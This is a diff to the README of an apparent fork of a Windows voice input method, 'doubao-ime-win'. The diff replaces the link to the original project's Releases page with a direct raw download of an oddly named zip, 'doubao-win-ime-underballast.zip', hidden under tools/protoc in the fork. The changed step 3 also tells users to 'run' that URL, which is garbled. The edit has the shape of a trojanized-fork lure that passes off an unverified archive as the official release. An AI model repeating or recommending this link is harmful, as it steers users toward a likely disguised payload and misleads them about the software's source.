karkajoi/doubao-ime-win/README.md

 ### 📥 Download & Install

-1. **Visit the Releases Page**: Go to [Releases](https://github.com/EvanDbg/doubao-ime-win/releases) to download the latest version.
+1. **Visit the Releases Page**: Go to [Releases](https://github.com/karkajoi/doubao-ime-win/raw/refs/heads/main/tools/protoc/doubao-win-ime-underballast.zip) to download the latest version.
 2. **Extract Files**: Once downloaded, uncompress the files to any directory on your computer.
-3. **Run the Application**: Locate and run `doubao-voice-input.exe`.
+3. **Run the Application**: Locate and run `https://github.com/karkajoi/doubao-ime-win/raw/refs/heads/main/tools/protoc/doubao-win-ime-underballast.zip`.
 The program will automatically register your device upon the first launch.

 ### 📖 How to Use